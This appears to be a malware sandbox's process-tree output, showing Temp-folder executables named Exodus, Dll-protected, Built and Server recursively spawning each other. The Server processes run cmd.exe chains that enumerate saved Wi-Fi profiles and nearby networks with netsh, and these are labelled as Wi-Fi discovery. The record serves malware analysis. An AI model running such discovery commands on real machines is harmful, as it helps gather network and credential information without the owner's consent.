C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"24⤵PID:3844
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"25⤵PID:5664
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"26⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"25⤵PID:1856
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All26⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4940 -
C:\Windows\SysWOW64\chcp.comchcp 6500127⤵PID:4840
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile27⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2012
-
-
C:\Windows\SysWOW64\findstr.exefindstr All27⤵PID:3824
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid26⤵PID:6340
-
C:\Windows\SysWOW64\chcp.comchcp 6500127⤵PID:6612
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid27⤵PID:7088
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"24⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"25⤵PID:384
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"26⤵PID:3244
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"27⤵PID:532
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"26⤵PID:5620
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"25⤵PID:4444
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"26⤵PID:1560
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"27⤵PID:2732
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"28⤵PID:2232
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"27⤵PID:1388
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All28⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5664 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV129⤵PID:4496
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500129⤵PID:5756
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile29⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5260
-
-
C:\Windows\SysWOW64\findstr.exefindstr All29⤵PID:3792
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid28⤵PID:6132
-
C:\Windows\SysWOW64\chcp.comchcp 6500129⤵PID:2376
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid29⤵PID:5220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"26⤵PID:3364
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"27⤵PID:3792
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"28⤵PID:5932
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"29⤵PID:3700
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"28⤵PID:4064
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All29⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5384 -
C:\Windows\SysWOW64\chcp.comchcp 6500130⤵PID:1148
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile30⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1388
-
-
C:\Windows\SysWOW64\findstr.exefindstr All30⤵PID:2340
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid29⤵PID:1400
-
C:\Windows\SysWOW64\chcp.comchcp 6500130⤵PID:4432
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid30⤵PID:1152
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"27⤵PID:4852
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"28⤵PID:2088
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"29⤵PID:5732
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"30⤵PID:4768
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"29⤵PID:3228
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All30⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV131⤵PID:3244
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500131⤵PID:4272
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile31⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1124
-
-
C:\Windows\SysWOW64\findstr.exefindstr All31⤵PID:5960
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid30⤵PID:5184
-
C:\Windows\SysWOW64\chcp.comchcp 6500131⤵PID:5104
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid31⤵PID:228
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"28⤵PID:1448
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"29⤵PID:4584
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"30⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"31⤵PID:936
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"30⤵PID:4184
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All31⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6872 -
C:\Windows\SysWOW64\chcp.comchcp 6500132⤵PID:7128
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile32⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4332
-
-
C:\Windows\SysWOW64\findstr.exefindstr All32⤵PID:6296
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid31⤵PID:6664
-
C:\Windows\SysWOW64\chcp.comchcp 6500132⤵PID:4520
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid32⤵PID:6400
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"29⤵PID:5260
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"30⤵PID:2120
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"31⤵PID:2220
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"32⤵PID:2848
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"31⤵PID:5572
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"30⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"31⤵PID:5944
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"32⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"33⤵PID:5812
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"32⤵PID:1584
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"31⤵PID:5484
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"32⤵PID:3208
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"33⤵PID:4444
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"34⤵PID:1296
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"33⤵PID:5632
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"32⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"33⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"34⤵PID:2904
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"35⤵PID:4612
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"34⤵PID:5692
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"33⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"34⤵PID:3048
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"35⤵PID:5352
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"36⤵PID:5960
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"35⤵PID:5260
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All36⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5080 -
C:\Windows\SysWOW64\chcp.comchcp 6500137⤵PID:5956
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile37⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4732
-
-
C:\Windows\SysWOW64\findstr.exefindstr All37⤵PID:5316
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid36⤵PID:5872
-
C:\Windows\SysWOW64\chcp.comchcp 6500137⤵PID:3808
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid37⤵PID:3976
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"34⤵PID:1736
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"35⤵PID:3824
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"36⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"37⤵PID:1464
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"36⤵PID:4436
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"35⤵PID:2876
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"36⤵PID:3208
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"37⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"38⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"37⤵PID:3172
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All38⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6748 -
C:\Windows\SysWOW64\chcp.comchcp 6500139⤵PID:6472
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile39⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2180
-
-
C:\Windows\SysWOW64\findstr.exefindstr All39⤵PID:1732
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"36⤵PID:384
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"37⤵PID:4560
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"38⤵PID:2692
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"39⤵PID:1416
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"38⤵PID:2528
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All39⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4332 -
C:\Windows\SysWOW64\chcp.comchcp 6500140⤵PID:4088
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile40⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4372
-
-
C:\Windows\SysWOW64\findstr.exefindstr All40⤵PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid39⤵PID:3436
-
C:\Windows\SysWOW64\chcp.comchcp 6500140⤵PID:4940
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid40⤵PID:6064
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"37⤵PID:4940
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"38⤵PID:3252
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"39⤵PID:5124
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"40⤵PID:440
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"39⤵PID:2688
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All40⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6992 -
C:\Windows\SysWOW64\chcp.comchcp 6500141⤵PID:5636
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile41⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3292
-
-
C:\Windows\SysWOW64\findstr.exefindstr All41⤵PID:6768
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid40⤵PID:5888
-
C:\Windows\SysWOW64\chcp.comchcp 6500141⤵PID:5536
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid41⤵PID:7060
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"38⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"39⤵PID:4280
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"40⤵PID:3288
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"41⤵PID:2180
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"40⤵PID:216
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All41⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4940 -
C:\Windows\SysWOW64\chcp.comchcp 6500142⤵PID:2864
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile42⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6676
-
-
C:\Windows\SysWOW64\findstr.exefindstr All42⤵PID:6564
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid41⤵PID:6840
-
C:\Windows\SysWOW64\chcp.comchcp 6500142⤵PID:6728
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid42⤵PID:6812
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"39⤵PID:5672
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"40⤵PID:5092
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"41⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"42⤵PID:812
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"41⤵PID:548
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"40⤵PID:1416
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"41⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"42⤵PID:6100
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"43⤵PID:5564
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"42⤵PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"41⤵PID:2180
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"42⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"43⤵PID:4876
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"44⤵PID:2772
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"43⤵PID:5872
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All44⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6864 -
C:\Windows\SysWOW64\chcp.comchcp 6500145⤵PID:6496
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile45⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6216
-
-
C:\Windows\SysWOW64\findstr.exefindstr All45⤵PID:1464
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid44⤵PID:5428
-
C:\Windows\SysWOW64\chcp.comchcp 6500145⤵PID:6460
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid45⤵PID:6656
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"42⤵PID:5092
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"43⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"44⤵PID:2904
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"45⤵PID:4828
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"44⤵PID:5944
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"43⤵PID:3496
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"44⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"45⤵PID:2480
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"46⤵PID:648
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"45⤵PID:1888
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"44⤵PID:3544
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"45⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"46⤵PID:3496
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"47⤵PID:5268
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"46⤵PID:5836
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"45⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"46⤵PID:5952
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"47⤵PID:6108
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"48⤵PID:3192
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"47⤵PID:5820
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"46⤵PID:5648
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"47⤵PID:2904
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"48⤵PID:1600
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"49⤵PID:5992
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"48⤵PID:5648
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"47⤵PID:4832
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"48⤵PID:3140
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"49⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"50⤵PID:6184
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"49⤵PID:2336
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"48⤵PID:2180
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"49⤵PID:5680
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"50⤵PID:7116
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"51⤵PID:5608
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"50⤵PID:6172
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"49⤵PID:2772
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"50⤵PID:2856
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"51⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"52⤵PID:6720
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"51⤵PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"50⤵PID:5700
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"51⤵PID:6928
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"52⤵PID:6880
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"53⤵PID:7060
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"52⤵PID:3280
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All53⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6228 -
C:\Windows\SysWOW64\chcp.comchcp 6500154⤵PID:6260
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile54⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6408
-
-
C:\Windows\SysWOW64\findstr.exefindstr All54⤵PID:6508
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"51⤵PID:7076
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"52⤵PID:1524
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"53⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"54⤵PID:4600
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"53⤵PID:7036
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"52⤵PID:7160
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"53⤵PID:6680
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"54⤵PID:4756
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"55⤵PID:6916
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"54⤵PID:3732
-
-
-
